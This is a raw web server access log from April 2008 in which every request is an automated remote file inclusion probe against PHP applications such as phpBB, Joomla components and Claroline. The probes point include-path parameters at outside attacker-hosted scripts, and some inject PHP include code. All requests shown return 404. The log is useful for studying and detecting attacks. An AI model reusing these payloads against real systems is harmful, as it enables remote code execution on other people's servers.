85.119.240.143 - - [01/Apr/2008:08:26:33 -0700] "GET /logs/errors.php?error=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:26:33 -0700] "GET /errors.php?error=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.bsfadvisors.com"
212.227.60.6 - - [01/Apr/2008:08:27:01 -0700] "GET /logs/access_080201.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/F2dpvS59.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:29:52 -0700] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:29:53 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:29:53 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:30:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:30:06 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:30:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:30:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:30:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
38.113.65.131 - - [01/Apr/2008:08:30:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
220.135.204.131 - - [01/Apr/2008:08:30:37 -0700] "GET /logs/access_080101.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
220.135.204.131 - - [01/Apr/2008:08:30:38 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
220.135.204.131 - - [01/Apr/2008:08:30:40 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:31:14 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:31:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:31:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:31:16 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:31:16 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:31:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:32:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:32:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
88.105.119.16 - - [01/Apr/2008:08:33:00 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.105.119.16 - - [01/Apr/2008:08:33:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.105.119.16 - - [01/Apr/2008:08:33:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:33:14 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:33:14 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:33:14 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.105.119.16 - - [01/Apr/2008:08:33:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:33:56 -0700] "GET /logs/includes/header_simple.php?_CONFIG[skin_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:33:56 -0700] "GET /includes/header_simple.php?_CONFIG[skin_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:34:33 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:34:34 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:34:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:34:49 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:34:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:08:34:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
80.67.27.193 - - [01/Apr/2008:08:35:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
80.67.27.193 - - [01/Apr/2008:08:35:20 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://treffpunkteinrich.de/newswriter14/include/tinymce_1_45/examples/zh_cn/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:35:24 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:35:25 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:35:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.232.156.130 - - [01/Apr/2008:08:36:56 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.232.156.130 - - [01/Apr/2008:08:36:56 -0700] "GET //config/dbutil.bck.php?confdir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.232.156.130 - - [01/Apr/2008:08:36:56 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
80.67.27.166 - - [01/Apr/2008:08:37:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:37:17 -0700] "GET /logs/access.log/modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:37:17 -0700] "GET /modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.206.242.35 - - [01/Apr/2008:08:37:18 -0700] "GET /logs/modules/upgrade_album.php?GALLERY_BASEDIR=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
77.221.130.9 - - [01/Apr/2008:08:39:27 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
77.221.130.9 - - [01/Apr/2008:08:39:27 -0700] "GET //config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
77.221.130.9 - - [01/Apr/2008:08:39:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
72.46.131.186 - - [01/Apr/2008:08:39:30 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:39:32 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.46.131.186 - - [01/Apr/2008:08:39:48 -0700] "GET /logs/access.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.46.131.186 - - [01/Apr/2008:08:39:49 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.46.131.186 - - [01/Apr/2008:08:39:49 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:05 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:11 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:11 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:13 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:13 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.249.11.138 - - [01/Apr/2008:08:40:13 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:13 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:27 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:33 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:33 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:40:34 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
77.221.130.9 - - [01/Apr/2008:08:41:46 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
77.221.130.9 - - [01/Apr/2008:08:41:46 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
77.221.130.9 - - [01/Apr/2008:08:41:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:42:27 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:08:42:28 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:08:42:28 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:42:28 -0700] "GET //config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:42:29 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:42:30 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:42:31 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:42:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:42:32 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:42:32 -0700] "GET //config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:42:33 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:42:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:42:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:08:42:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:42:47 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:42:47 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:42:47 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:08:43:35 -0700] "GET /logs/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
